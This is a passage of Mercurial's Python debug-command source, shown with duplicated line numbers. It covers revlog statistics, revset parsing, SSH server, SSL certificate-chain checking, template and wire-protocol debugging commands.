1917 1917
1918 1918 if opts.get("dump"):
1919 1919 numrevs = len(r)
1920 1920 ui.write(("# rev p1rev p2rev start end deltastart base p1 p2"
1921 1921 " rawsize totalsize compression heads chainlen\n"))
1922 1922 ts = 0
1923 1923 heads = set()
1924 1924
1925 1925 for rev in xrange(numrevs):
1926 1926 dbase = r.deltaparent(rev)
1927 1927 if dbase == -1:
1928 1928 dbase = rev
1929 1929 cbase = r.chainbase(rev)
1930 1930 clen = r.chainlen(rev)
1931 1931 p1, p2 = r.parentrevs(rev)
1932 1932 rs = r.rawsize(rev)
1933 1933 ts = ts + rs
1934 1934 heads -= set(r.parentrevs(rev))
1935 1935 heads.add(rev)
1936 1936 try:
1937 1937 compression = ts / r.end(rev)
1938 1938 except ZeroDivisionError:
1939 1939 compression = 0
1940 1940 ui.write("%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d "
1941 1941 "%11d %5d %8d\n" %
1942 1942 (rev, p1, p2, r.start(rev), r.end(rev),
1943 1943 r.start(dbase), r.start(cbase),
1944 1944 r.start(p1), r.start(p2),
1945 1945 rs, ts, compression, len(heads), clen))
1946 1946 return 0
1947 1947
1948 1948 v = r.version
1949 1949 format = v & 0xFFFF
1950 1950 flags = []
1951 1951 gdelta = False
1952 1952 if v & revlog.FLAG_INLINE_DATA:
1953 1953 flags.append('inline')
1954 1954 if v & revlog.FLAG_GENERALDELTA:
1955 1955 gdelta = True
1956 1956 flags.append('generaldelta')
1957 1957 if not flags:
1958 1958 flags = ['(none)']
1959 1959
1960 1960 nummerges = 0
1961 1961 numfull = 0
1962 1962 numprev = 0
1963 1963 nump1 = 0
1964 1964 nump2 = 0
1965 1965 numother = 0
1966 1966 nump1prev = 0
1967 1967 nump2prev = 0
1968 1968 chainlengths = []
1969 1969 chainbases = []
1970 1970 chainspans = []
1971 1971
1972 1972 datasize = [None, 0, 0]
1973 1973 fullsize = [None, 0, 0]
1974 1974 deltasize = [None, 0, 0]
1975 1975 chunktypecounts = {}
1976 1976 chunktypesizes = {}
1977 1977
1978 1978 def addsize(size, l):
1979 1979 if l[0] is None or size < l[0]:
1980 1980 l[0] = size
1981 1981 if size > l[1]:
1982 1982 l[1] = size
1983 1983 l[2] += size
1984 1984
1985 1985 numrevs = len(r)
1986 1986 for rev in xrange(numrevs):
1987 1987 p1, p2 = r.parentrevs(rev)
1988 1988 delta = r.deltaparent(rev)
1989 1989 if format > 0:
1990 1990 addsize(r.rawsize(rev), datasize)
1991 1991 if p2 != nullrev:
1992 1992 nummerges += 1
1993 1993 size = r.length(rev)
1994 1994 if delta == nullrev:
1995 1995 chainlengths.append(0)
1996 1996 chainbases.append(r.start(rev))
1997 1997 chainspans.append(size)
1998 1998 numfull += 1
1999 1999 addsize(size, fullsize)
2000 2000 else:
2001 2001 chainlengths.append(chainlengths[delta] + 1)
2002 2002 baseaddr = chainbases[delta]
2003 2003 revaddr = r.start(rev)
2004 2004 chainbases.append(baseaddr)
2005 2005 chainspans.append((revaddr - baseaddr) + size)
2006 2006 addsize(size, deltasize)
2007 2007 if delta == rev - 1:
2008 2008 numprev += 1
2009 2009 if delta == p1:
2010 2010 nump1prev += 1
2011 2011 elif delta == p2:
2012 2012 nump2prev += 1
2013 2013 elif delta == p1:
2014 2014 nump1 += 1
2015 2015 elif delta == p2:
2016 2016 nump2 += 1
2017 2017 elif delta != nullrev:
2018 2018 numother += 1
2019 2019
2020 2020 # Obtain data on the raw chunks in the revlog.
2021 2021 segment = r._getsegmentforrevs(rev, rev)[1]
2022 2022 if segment:
2023 2023 chunktype = bytes(segment[0:1])
2024 2024 else:
2025 2025 chunktype = 'empty'
2026 2026
2027 2027 if chunktype not in chunktypecounts:
2028 2028 chunktypecounts[chunktype] = 0
2029 2029 chunktypesizes[chunktype] = 0
2030 2030
2031 2031 chunktypecounts[chunktype] += 1
2032 2032 chunktypesizes[chunktype] += size
2033 2033
2034 2034 # Adjust size min value for empty cases
2035 2035 for size in (datasize, fullsize, deltasize):
2036 2036 if size[0] is None:
2037 2037 size[0] = 0
2038 2038
2039 2039 numdeltas = numrevs - numfull
2040 2040 numoprev = numprev - nump1prev - nump2prev
2041 2041 totalrawsize = datasize[2]
2042 2042 datasize[2] /= numrevs
2043 2043 fulltotal = fullsize[2]
2044 2044 fullsize[2] /= numfull
2045 2045 deltatotal = deltasize[2]
2046 2046 if numrevs - numfull > 0:
2047 2047 deltasize[2] /= numrevs - numfull
2048 2048 totalsize = fulltotal + deltatotal
2049 2049 avgchainlen = sum(chainlengths) / numrevs
2050 2050 maxchainlen = max(chainlengths)
2051 2051 maxchainspan = max(chainspans)
2052 2052 compratio = 1
2053 2053 if totalsize:
2054 2054 compratio = totalrawsize / totalsize
2055 2055
2056 2056 basedfmtstr = '%%%dd\n'
2057 2057 basepcfmtstr = '%%%dd %s(%%5.2f%%%%)\n'
2058 2058
2059 2059 def dfmtstr(max):
2060 2060 return basedfmtstr % len(str(max))
2061 2061 def pcfmtstr(max, padding=0):
2062 2062 return basepcfmtstr % (len(str(max)), ' ' * padding)
2063 2063
2064 2064 def pcfmt(value, total):
2065 2065 if total:
2066 2066 return (value, 100 * float(value) / total)
2067 2067 else:
2068 2068 return value, 100.0
2069 2069
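# Illustrative example of the helpers above: pcfmt(25, 100) returns
# (25, 25.0), rendered by a pcfmtstr format as e.g. "25 (25.00%)"
# (the field width depends on the total), while pcfmt(5, 0) degrades
# to (5, 100.0) to avoid dividing by zero.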
2070 2070 ui.write(('format : %d\n') % format)
2071 2071 ui.write(('flags : %s\n') % ', '.join(flags))
2072 2072
2073 2073 ui.write('\n')
2074 2074 fmt = pcfmtstr(totalsize)
2075 2075 fmt2 = dfmtstr(totalsize)
2076 2076 ui.write(('revisions : ') + fmt2 % numrevs)
2077 2077 ui.write((' merges : ') + fmt % pcfmt(nummerges, numrevs))
2078 2078 ui.write((' normal : ') + fmt % pcfmt(numrevs - nummerges, numrevs))
2079 2079 ui.write(('revisions : ') + fmt2 % numrevs)
2080 2080 ui.write((' full : ') + fmt % pcfmt(numfull, numrevs))
2081 2081 ui.write((' deltas : ') + fmt % pcfmt(numdeltas, numrevs))
2082 2082 ui.write(('revision size : ') + fmt2 % totalsize)
2083 2083 ui.write((' full : ') + fmt % pcfmt(fulltotal, totalsize))
2084 2084 ui.write((' deltas : ') + fmt % pcfmt(deltatotal, totalsize))
2085 2085
2086 2086 def fmtchunktype(chunktype):
2087 2087 if chunktype == 'empty':
2088 2088 return ' %s : ' % chunktype
2089 2089 elif chunktype in pycompat.bytestr(string.ascii_letters):
2090 2090 return ' 0x%s (%s) : ' % (hex(chunktype), chunktype)
2091 2091 else:
2092 2092 return ' 0x%s : ' % hex(chunktype)
2093 2093
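# For example, fmtchunktype('u') yields ' 0x75 (u) : ' while an
# unprintable chunk type such as '\x00' yields ' 0x00 : '.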
2094 2094 ui.write('\n')
2095 2095 ui.write(('chunks : ') + fmt2 % numrevs)
2096 2096 for chunktype in sorted(chunktypecounts):
2097 2097 ui.write(fmtchunktype(chunktype))
2098 2098 ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs))
2099 2099 ui.write(('chunks size : ') + fmt2 % totalsize)
2100 2100 for chunktype in sorted(chunktypecounts):
2101 2101 ui.write(fmtchunktype(chunktype))
2102 2102 ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize))
2103 2103
2104 2104 ui.write('\n')
2105 2105 fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio))
2106 2106 ui.write(('avg chain length : ') + fmt % avgchainlen)
2107 2107 ui.write(('max chain length : ') + fmt % maxchainlen)
2108 2108 ui.write(('max chain reach : ') + fmt % maxchainspan)
2109 2109 ui.write(('compression ratio : ') + fmt % compratio)
2110 2110
2111 2111 if format > 0:
2112 2112 ui.write('\n')
2113 2113 ui.write(('uncompressed data size (min/max/avg) : %d / %d / %d\n')
2114 2114 % tuple(datasize))
2115 2115 ui.write(('full revision size (min/max/avg) : %d / %d / %d\n')
2116 2116 % tuple(fullsize))
2117 2117 ui.write(('delta size (min/max/avg) : %d / %d / %d\n')
2118 2118 % tuple(deltasize))
2119 2119
2120 2120 if numdeltas > 0:
2121 2121 ui.write('\n')
2122 2122 fmt = pcfmtstr(numdeltas)
2123 2123 fmt2 = pcfmtstr(numdeltas, 4)
2124 2124 ui.write(('deltas against prev : ') + fmt % pcfmt(numprev, numdeltas))
2125 2125 if numprev > 0:
2126 2126 ui.write((' where prev = p1 : ') + fmt2 % pcfmt(nump1prev,
2127 2127 numprev))
2128 2128 ui.write((' where prev = p2 : ') + fmt2 % pcfmt(nump2prev,
2129 2129 numprev))
2130 2130 ui.write((' other : ') + fmt2 % pcfmt(numoprev,
2131 2131 numprev))
2132 2132 if gdelta:
2133 2133 ui.write(('deltas against p1 : ')
2134 2134 + fmt % pcfmt(nump1, numdeltas))
2135 2135 ui.write(('deltas against p2 : ')
2136 2136 + fmt % pcfmt(nump2, numdeltas))
2137 2137 ui.write(('deltas against other : ') + fmt % pcfmt(numother,
2138 2138 numdeltas))
2139 2139
2140 2140 @command('debugrevspec',
2141 2141 [('', 'optimize', None,
2142 2142 _('print parsed tree after optimizing (DEPRECATED)')),
2143 2143 ('', 'show-revs', True, _('print list of result revisions (default)')),
2144 2144 ('s', 'show-set', None, _('print internal representation of result set')),
2145 2145 ('p', 'show-stage', [],
2146 2146 _('print parsed tree at the given stage'), _('NAME')),
2147 2147 ('', 'no-optimized', False, _('evaluate tree without optimization')),
2148 2148 ('', 'verify-optimized', False, _('verify optimized result')),
2149 2149 ],
2150 2150 ('REVSPEC'))
2151 2151 def debugrevspec(ui, repo, expr, **opts):
2152 2152 """parse and apply a revision specification
2153 2153
2154 2154 Use the -p/--show-stage option to print the parsed tree at the given
2155 2155 stages. Use ``-p all`` to print the tree at every stage.
2156 2156
2157 2157 Use the --no-show-revs option with -s or -p to print only the set
2158 2158 representation or the parsed tree, respectively.
2159 2159
2160 2160 Use --verify-optimized to compare the optimized result with the unoptimized
2161 2161 one. Returns 1 if the optimized result differs.
2162 2162 """
2163 2163 opts = pycompat.byteskwargs(opts)
2164 2164 aliases = ui.configitems('revsetalias')
2165 2165 stages = [
2166 2166 ('parsed', lambda tree: tree),
2167 2167 ('expanded', lambda tree: revsetlang.expandaliases(tree, aliases,
2168 2168 ui.warn)),
2169 2169 ('concatenated', revsetlang.foldconcat),
2170 2170 ('analyzed', revsetlang.analyze),
2171 2171 ('optimized', revsetlang.optimize),
2172 2172 ]
2173 2173 if opts['no_optimized']:
2174 2174 stages = stages[:-1]
2175 2175 if opts['verify_optimized'] and opts['no_optimized']:
2176 2176 raise error.Abort(_('cannot use --verify-optimized with '
2177 2177 '--no-optimized'))
2178 2178 stagenames = set(n for n, f in stages)
2179 2179
2180 2180 showalways = set()
2181 2181 showchanged = set()
2182 2182 if ui.verbose and not opts['show_stage']:
2183 2183 # show parsed tree by --verbose (deprecated)
2184 2184 showalways.add('parsed')
2185 2185 showchanged.update(['expanded', 'concatenated'])
2186 2186 if opts['optimize']:
2187 2187 showalways.add('optimized')
2188 2188 if opts['show_stage'] and opts['optimize']:
2189 2189 raise error.Abort(_('cannot use --optimize with --show-stage'))
2190 2190 if opts['show_stage'] == ['all']:
2191 2191 showalways.update(stagenames)
2192 2192 else:
2193 2193 for n in opts['show_stage']:
2194 2194 if n not in stagenames:
2195 2195 raise error.Abort(_('invalid stage name: %s') % n)
2196 2196 showalways.update(opts['show_stage'])
2197 2197
2198 2198 treebystage = {}
2199 2199 printedtree = None
2200 2200 tree = revsetlang.parse(expr, lookup=repo.__contains__)
2201 2201 for n, f in stages:
2202 2202 treebystage[n] = tree = f(tree)
2203 2203 if n in showalways or (n in showchanged and tree != printedtree):
2204 2204 if opts['show_stage'] or n != 'parsed':
2205 2205 ui.write(("* %s:\n") % n)
2206 2206 ui.write(revsetlang.prettyformat(tree), "\n")
2207 2207 printedtree = tree
2208 2208
2209 2209 if opts['verify_optimized']:
2210 2210 arevs = revset.makematcher(treebystage['analyzed'])(repo)
2211 2211 brevs = revset.makematcher(treebystage['optimized'])(repo)
2212 2212 if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
2213 2213 ui.write(("* analyzed set:\n"), smartset.prettyformat(arevs), "\n")
2214 2214 ui.write(("* optimized set:\n"), smartset.prettyformat(brevs), "\n")
2215 2215 arevs = list(arevs)
2216 2216 brevs = list(brevs)
2217 2217 if arevs == brevs:
2218 2218 return 0
2219 2219 ui.write(('--- analyzed\n'), label='diff.file_a')
2220 2220 ui.write(('+++ optimized\n'), label='diff.file_b')
2221 2221 sm = difflib.SequenceMatcher(None, arevs, brevs)
2222 2222 for tag, alo, ahi, blo, bhi in sm.get_opcodes():
2223 2223 if tag in ('delete', 'replace'):
2224 2224 for c in arevs[alo:ahi]:
2225 2225 ui.write('-%s\n' % c, label='diff.deleted')
2226 2226 if tag in ('insert', 'replace'):
2227 2227 for c in brevs[blo:bhi]:
2228 2228 ui.write('+%s\n' % c, label='diff.inserted')
2229 2229 if tag == 'equal':
2230 2230 for c in arevs[alo:ahi]:
2231 2231 ui.write(' %s\n' % c)
2232 2232 return 1
2233 2233
2234 2234 func = revset.makematcher(tree)
2235 2235 revs = func(repo)
2236 2236 if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
2237 2237 ui.write(("* set:\n"), smartset.prettyformat(revs), "\n")
2238 2238 if not opts['show_revs']:
2239 2239 return
2240 2240 for c in revs:
2241 2241 ui.write("%d\n" % c)
2242 2242
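# Illustrative usage of debugrevspec:
#
#   $ hg debugrevspec -p all '::2'
#
# prints the parsed, expanded, concatenated, analyzed and optimized
# trees, followed by the matching revision numbers, one per line.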
2243 2243 @command('debugserve', [
2244 2244 ('', 'sshstdio', False, _('run an SSH server bound to process handles')),
2245 2245 ('', 'logiofd', '', _('file descriptor to log server I/O to')),
2246 2246 ('', 'logiofile', '', _('file to log server I/O to')),
2247 2247 ], '')
2248 2248 def debugserve(ui, repo, **opts):
2249 2249 """run a server with advanced settings
2250 2250
2251 2251 This command is similar to :hg:`serve`. It exists partially as a
2252 2252 workaround for the fact that ``hg serve --stdio`` must have specific
2253 2253 arguments for security reasons.
2254 2254 """
2255 2255 opts = pycompat.byteskwargs(opts)
2256 2256
2257 2257 if not opts['sshstdio']:
2258 2258 raise error.Abort(_('only --sshstdio is currently supported'))
2259 2259
2260 2260 logfh = None
2261 2261
2262 2262 if opts['logiofd'] and opts['logiofile']:
2263 2263 raise error.Abort(_('cannot use both --logiofd and --logiofile'))
2264 2264
2265 2265 if opts['logiofd']:
2266 2266 # Line buffered because output is line based.
2267 2267 logfh = os.fdopen(int(opts['logiofd']), r'ab', 1)
2268 2268 elif opts['logiofile']:
2269 2269 logfh = open(opts['logiofile'], 'ab', 1)
2270 2270
2271 2271 s = wireprotoserver.sshserver(ui, repo, logfh=logfh)
2272 2272 s.serve_forever()
2273 2273
2274 2274 @command('debugsetparents', [], _('REV1 [REV2]'))
2275 2275 def debugsetparents(ui, repo, rev1, rev2=None):
2276 2276 """manually set the parents of the current working directory
2277 2277
2278 2278 This is useful for writing repository conversion tools, but should
2279 2279 be used with care. For example, neither the working directory nor the
2280 2280 dirstate is updated, so file status may be incorrect after running this
2281 2281 command.
2282 2282
2283 2283 Returns 0 on success.
2284 2284 """
2285 2285
2286 2286 r1 = scmutil.revsingle(repo, rev1).node()
2287 2287 r2 = scmutil.revsingle(repo, rev2, 'null').node()
2288 2288
2289 2289 with repo.wlock():
2290 2290 repo.setparents(r1, r2)
2291 2291
2292 2292 @command('debugssl', [], '[SOURCE]', optionalrepo=True)
2293 2293 def debugssl(ui, repo, source=None, **opts):
2294 2294 '''test a secure connection to a server
2295 2295
2296 2296 This builds the certificate chain for the server on Windows, installing the
2297 2297 missing intermediates and trusted root via Windows Update if necessary. It
2298 2298 does nothing on other platforms.
2299 2299
2300 2300 If SOURCE is omitted, the 'default' path will be used. If a URL is given,
2301 2301 that server is used. See :hg:`help urls` for more information.
2302 2302
2303 2303 If the update succeeds, retry the original operation. Otherwise, the cause
2304 2304 of the SSL error is likely another issue.
2305 2305 '''
2306 2306 if not pycompat.iswindows:
2307 2307 raise error.Abort(_('certificate chain building is only possible on '
2308 2308 'Windows'))
2309 2309
2310 2310 if not source:
2311 2311 if not repo:
2312 2312 raise error.Abort(_("there is no Mercurial repository here, and no "
2313 2313 "server specified"))
2314 2314 source = "default"
2315 2315
2316 2316 source, branches = hg.parseurl(ui.expandpath(source))
2317 2317 url = util.url(source)
2318 2318 addr = None
2319 2319
2320 2320 defaultport = {'https': 443, 'ssh': 22}
2321 2321 if url.scheme in defaultport:
2322 2322 try:
2323 2323 addr = (url.host, int(url.port or defaultport[url.scheme]))
2324 2324 except ValueError:
2325 2325 raise error.Abort(_("malformed port number in URL"))
2326 2326 else:
2327 2327 raise error.Abort(_("only https and ssh connections are supported"))
2328 2328
2329 2329 from . import win32
2330 2330
2331 2331 s = ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_TLS,
2332 2332 cert_reqs=ssl.CERT_NONE, ca_certs=None)
2333 2333
2334 2334 try:
2335 2335 s.connect(addr)
2336 2336 cert = s.getpeercert(True)
2337 2337
2338 2338 ui.status(_('checking the certificate chain for %s\n') % url.host)
2339 2339
2340 2340 complete = win32.checkcertificatechain(cert, build=False)
2341 2341
2342 2342 if not complete:
2343 2343 ui.status(_('certificate chain is incomplete, updating... '))
2344 2344
2345 2345 if not win32.checkcertificatechain(cert):
2346 2346 ui.status(_('failed.\n'))
2347 2347 else:
2348 2348 ui.status(_('done.\n'))
2349 2349 else:
2350 2350 ui.status(_('full certificate chain is available\n'))
2351 2351 finally:
2352 2352 s.close()
2353 2353
2354 2354 @command('debugsub',
2355 2355 [('r', 'rev', '',
2356 2356 _('revision to check'), _('REV'))],
2357 2357 _('[-r REV] [REV]'))
2358 2358 def debugsub(ui, repo, rev=None):
2359 2359 ctx = scmutil.revsingle(repo, rev, None)
2360 2360 for k, v in sorted(ctx.substate.items()):
2361 2361 ui.write(('path %s\n') % k)
2362 2362 ui.write((' source %s\n') % v[0])
2363 2363 ui.write((' revision %s\n') % v[1])
2364 2364
2365 2365 @command('debugsuccessorssets',
2366 2366 [('', 'closest', False, _('return closest successors sets only'))],
2367 2367 _('[REV]'))
2368 2368 def debugsuccessorssets(ui, repo, *revs, **opts):
2369 2369 """show set of successors for revision
2370 2370
2371 2371 A successors set of changeset A is a consistent group of revisions that
2372 2372 succeed A. It contains non-obsolete changesets only unless the
2373 2373 closest successors sets are requested (see --closest).
2374 2374
2375 2375 In most cases a changeset A has a single successors set containing a single
2376 2376 successor (changeset A replaced by A').
2377 2377
2378 2378 A changeset that is made obsolete with no successors is called "pruned".
2379 2379 Such changesets have no successors sets at all.
2380 2380
2381 2381 A changeset that has been "split" will have a successors set containing
2382 2382 more than one successor.
2383 2383
2384 2384 A changeset that has been rewritten in multiple different ways is called
2385 2385 "divergent". Such changesets have multiple successor sets (each of which
2386 2386 may also be split, i.e. have multiple successors).
2387 2387
2388 2388 Results are displayed as follows::
2389 2389
2390 2390 <rev1>
2391 2391 <successors-1A>
2392 2392 <rev2>
2393 2393 <successors-2A>
2394 2394 <successors-2B1> <successors-2B2> <successors-2B3>
2395 2395
2396 2396 Here rev2 has two possible (i.e. divergent) successors sets. The first
2397 2397 holds one element, whereas the second holds three (i.e. the changeset has
2398 2398 been split).
2399 2399 """
2400 2400 # passed to successorssets caching computation from one call to another
2401 2401 cache = {}
2402 2402 ctx2str = bytes
2403 2403 node2str = short
2404 2404 for rev in scmutil.revrange(repo, revs):
2405 2405 ctx = repo[rev]
2406 2406 ui.write('%s\n' % ctx2str(ctx))
2407 2407 for succsset in obsutil.successorssets(repo, ctx.node(),
2408 2408 closest=opts[r'closest'],
2409 2409 cache=cache):
2410 2410 if succsset:
2411 2411 ui.write(' ')
2412 2412 ui.write(node2str(succsset[0]))
2413 2413 for node in succsset[1:]:
2414 2414 ui.write(' ')
2415 2415 ui.write(node2str(node))
2416 2416 ui.write('\n')
2417 2417
2418 2418 @command('debugtemplate',
2419 2419 [('r', 'rev', [], _('apply template on changesets'), _('REV')),
2420 2420 ('D', 'define', [], _('define template keyword'), _('KEY=VALUE'))],
2421 2421 _('[-r REV]... [-D KEY=VALUE]... TEMPLATE'),
2422 2422 optionalrepo=True)
2423 2423 def debugtemplate(ui, repo, tmpl, **opts):
2424 2424 """parse and apply a template
2425 2425
2426 2426 If -r/--rev is given, the template is processed as a log template and
2427 2427 applied to the given changesets. Otherwise, it is processed as a generic
2428 2428 template.
2429 2429
2430 2430 Use --verbose to print the parsed tree.
2431 2431 """
2432 2432 revs = None
2433 2433 if opts[r'rev']:
2434 2434 if repo is None:
2435 2435 raise error.RepoError(_('there is no Mercurial repository here '
2436 2436 '(.hg not found)'))
2437 2437 revs = scmutil.revrange(repo, opts[r'rev'])
2438 2438
2439 2439 props = {}
2440 2440 for d in opts[r'define']:
2441 2441 try:
2442 2442 k, v = (e.strip() for e in d.split('=', 1))
2443 2443 if not k or k == 'ui':
2444 2444 raise ValueError
2445 2445 props[k] = v
2446 2446 except ValueError:
2447 2447 raise error.Abort(_('malformed keyword definition: %s') % d)
2448 2448
2449 2449 if ui.verbose:
2450 2450 aliases = ui.configitems('templatealias')
2451 2451 tree = templater.parse(tmpl)
2452 2452 ui.note(templater.prettyformat(tree), '\n')
2453 2453 newtree = templater.expandaliases(tree, aliases)
2454 2454 if newtree != tree:
2455 2455 ui.note(("* expanded:\n"), templater.prettyformat(newtree), '\n')
2456 2456
2457 2457 if revs is None:
2458 2458 tres = formatter.templateresources(ui, repo)
2459 2459 t = formatter.maketemplater(ui, tmpl, resources=tres)
2460 2460 ui.write(t.renderdefault(props))
2461 2461 else:
2462 2462 displayer = logcmdutil.maketemplater(ui, repo, tmpl)
2463 2463 for r in revs:
2464 2464 displayer.show(repo[r], **pycompat.strkwargs(props))
2465 2465 displayer.close()
2466 2466
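# Illustrative usage of debugtemplate (the keyword name is arbitrary):
#
#   $ hg debugtemplate -D word=hello '{word}\n'
#   hello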
2467 2467 @command('debuguigetpass', [
2468 2468 ('p', 'prompt', '', _('prompt text'), _('TEXT')),
2469 2469 ], _('[-p TEXT]'), norepo=True)
2470 2470 def debuguigetpass(ui, prompt=''):
2471 2471 """show prompt to type password"""
2472 2472 r = ui.getpass(prompt)
2473 2473 ui.write(('response: %s\n') % r)
2474 2474
2475 2475 @command('debuguiprompt', [
2476 2476 ('p', 'prompt', '', _('prompt text'), _('TEXT')),
2477 2477 ], _('[-p TEXT]'), norepo=True)
2478 2478 def debuguiprompt(ui, prompt=''):
2479 2479 """show plain prompt"""
2480 2480 r = ui.prompt(prompt)
2481 2481 ui.write(('response: %s\n') % r)
2482 2482
2483 2483 @command('debugupdatecaches', [])
2484 2484 def debugupdatecaches(ui, repo, *pats, **opts):
2485 2485 """warm all known caches in the repository"""
2486 2486 with repo.wlock(), repo.lock():
2487 2487 repo.updatecaches(full=True)
2488 2488
2489 2489 @command('debugupgraderepo', [
2490 2490 ('o', 'optimize', [], _('extra optimization to perform'), _('NAME')),
2491 2491 ('', 'run', False, _('performs an upgrade')),
2492 2492 ])
2493 2493 def debugupgraderepo(ui, repo, run=False, optimize=None):
2494 2494 """upgrade a repository to use different features
2495 2495
2496 2496 If no arguments are specified, the repository is evaluated for upgrade
2497 2497 and a list of problems and potential optimizations is printed.
2498 2498
2499 2499 With ``--run``, a repository upgrade is performed. Behavior of the upgrade
2500 2500 can be influenced via additional arguments. More details will be provided
2501 2501 by the command output when run without ``--run``.
2502 2502
2503 2503 During the upgrade, the repository will be locked and no writes will be
2504 2504 allowed.
2505 2505
2506 2506 At the end of the upgrade, the repository may not be readable while new
2507 2507 repository data is swapped in. This window will be as long as it takes to
2508 2508 rename some directories inside the ``.hg`` directory. On most machines, this
2509 2509 should complete almost instantaneously and the chances of a consumer being
2510 2510 unable to access the repository should be low.
2511 2511 """
2512 2512 return upgrade.upgraderepo(ui, repo, run=run, optimize=optimize)
2513 2513
2514 2514 @command('debugwalk', cmdutil.walkopts, _('[OPTION]... [FILE]...'),
2515 2515 inferrepo=True)
2516 2516 def debugwalk(ui, repo, *pats, **opts):
2517 2517 """show how files match on given patterns"""
2518 2518 opts = pycompat.byteskwargs(opts)
2519 2519 m = scmutil.match(repo[None], pats, opts)
2520 2520 ui.write(('matcher: %r\n') % m)
2521 2521 items = list(repo[None].walk(m))
2522 2522 if not items:
2523 2523 return
2524 2524 f = lambda fn: fn
2525 2525 if ui.configbool('ui', 'slash') and pycompat.ossep != '/':
2526 2526 f = lambda fn: util.normpath(fn)
2527 2527 fmt = 'f %%-%ds %%-%ds %%s' % (
2528 2528 max([len(abs) for abs in items]),
2529 2529 max([len(m.rel(abs)) for abs in items]))
2530 2530 for abs in items:
2531 2531 line = fmt % (abs, f(m.rel(abs)), m.exact(abs) and 'exact' or '')
2532 2532 ui.write("%s\n" % line.rstrip())
2533 2533
2534 2534 @command('debugwhyunstable', [], _('REV'))
2535 2535 def debugwhyunstable(ui, repo, rev):
2536 2536 """explain instabilities of a changeset"""
2537 2537 for entry in obsutil.whyunstable(repo, repo[rev]):
2538 2538 dnodes = ''
2539 2539 if entry.get('divergentnodes'):
2540 2540 dnodes = ' '.join('%s (%s)' % (ctx.hex(), ctx.phasestr())
2541 2541 for ctx in entry['divergentnodes']) + ' '
2542 2542 ui.write('%s: %s%s %s\n' % (entry['instability'], dnodes,
2543 2543 entry['reason'], entry['node']))
2544 2544
2545 2545 @command('debugwireargs',
2546 2546 [('', 'three', '', 'three'),
2547 2547 ('', 'four', '', 'four'),
2548 2548 ('', 'five', '', 'five'),
2549 2549 ] + cmdutil.remoteopts,
2550 2550 _('REPO [OPTIONS]... [ONE [TWO]]'),
2551 2551 norepo=True)
2552 2552 def debugwireargs(ui, repopath, *vals, **opts):
2553 2553 opts = pycompat.byteskwargs(opts)
2554 2554 repo = hg.peer(ui, opts, repopath)
2555 2555 for opt in cmdutil.remoteopts:
2556 2556 del opts[opt[1]]
2557 2557 args = {}
2558 2558 for k, v in opts.iteritems():
2559 2559 if v:
2560 2560 args[k] = v
2561 2561 args = pycompat.strkwargs(args)
2562 2562 # run twice to check that we don't mess up the stream for the next command
2563 2563 res1 = repo.debugwireargs(*vals, **args)
2564 2564 res2 = repo.debugwireargs(*vals, **args)
2565 2565 ui.write("%s\n" % res1)
2566 2566 if res1 != res2:
2567 2567 ui.warn("%s\n" % res2)
2568 2568
2569 2569 def _parsewirelangblocks(fh):
2570 2570 activeaction = None
2571 2571 blocklines = []
2572 2572
2573 2573 for line in fh:
2574 2574 line = line.rstrip()
2575 2575 if not line:
2576 2576 continue
2577 2577
2578 2578 if line.startswith(b'#'):
2579 2579 continue
2580 2580
2581 2581 if not line.startswith(' '):
2582 2582 # New block. Flush previous one.
2583 2583 if activeaction:
2584 2584 yield activeaction, blocklines
2585 2585
2586 2586 activeaction = line
2587 2587 blocklines = []
2588 2588 continue
2589 2589
2590 2590 # Else we start with an indent.
2591 2591
2592 2592 if not activeaction:
2593 2593 raise error.Abort(_('indented line outside of block'))
2594 2594
2595 2595 blocklines.append(line)
2596 2596
2597 2597 # Flush last block.
2598 2598 if activeaction:
2599 2599 yield activeaction, blocklines
2600 2600
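# Illustrative sketch of the parser above: given the input lines
#
#   command listkeys
#       namespace bookmarks
#   flush
#
# it yields ('command listkeys', ['    namespace bookmarks']) followed
# by ('flush', []).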
2601 2601 @command('debugwireproto',
2602 2602 [
2603 2603 ('', 'localssh', False, _('start an SSH server for this repo')),
2604 2604 ('', 'peer', '', _('construct a specific version of the peer')),
2605 2605 ('', 'noreadstderr', False, _('do not read from stderr of the remote')),
2606 2606 ] + cmdutil.remoteopts,
2607 2607 _('[PATH]'),
2608 2608 optionalrepo=True)
2609 2609 def debugwireproto(ui, repo, path=None, **opts):
2610 2610 """send wire protocol commands to a server
2611 2611
2612 2612 This command can be used to issue wire protocol commands to remote
2613 2613 peers and to debug the raw data being exchanged.
2614 2614
2615 2615 ``--localssh`` will start an SSH server against the current repository
2616 2616 and connect to that. By default, the connection will perform a handshake
2617 2617 and establish an appropriate peer instance.
2618 2618
2619 2619 ``--peer`` can be used to bypass the handshake protocol and construct a
2620 2620 peer instance using the specified class type. Valid values are ``raw``,
2621 2621 ``ssh1``, and ``ssh2``. ``raw`` instances only allow sending raw data
2622 2622 payloads and don't support higher-level command actions.
2623 2623
2624 2624 ``--noreadstderr`` can be used to disable automatic reading from stderr
2625 2625 of the peer (for SSH connections only). Disabling automatic reading of
2626 2626 stderr is useful for making output more deterministic.
2627 2627
2628 2628 Commands are issued via a mini language which is specified via stdin.
2629 2629 The language consists of individual actions to perform. An action is
2630 2630 defined by a block. A block is defined as a line with no leading
2631 2631 space followed by 0 or more lines with leading space. Blocks are
2632 2632 effectively a high-level command with additional metadata.
2633 2633
2634 2634 Lines beginning with ``#`` are ignored.
2635 2635
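For example, a small script (assuming an established peer) might issue
a single command and then close the connection::

    command listkeys
        namespace bookmarks
    close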
2636 2636 The following sections denote available actions.
2637 2637
2638 2638 raw
2639 2639 ---
2640 2640
2641 2641 Send raw data to the server.
2642 2642
2643 2643 The block payload contains the raw data to send as one atomic send
2644 2644 operation. The data may not actually be delivered in a single system
2645 2645 call: it depends on the abilities of the transport being used.
2646 2646
2647 2647 Each line in the block is de-indented and concatenated. Then, that
2648 2648 value is evaluated as a Python b'' literal. This allows the use of
2649 2649 backslash escaping, etc.
2650 2650
2651 2651 raw+
2652 2652 ----
2653 2653
2654 2654 Behaves like ``raw`` except flushes output afterwards.
2655 2655
2656 2656 command <X>
2657 2657 -----------
2658 2658
2659 2659 Send a request to run a named command, whose name follows the ``command``
2660 2660 string.
2661 2661
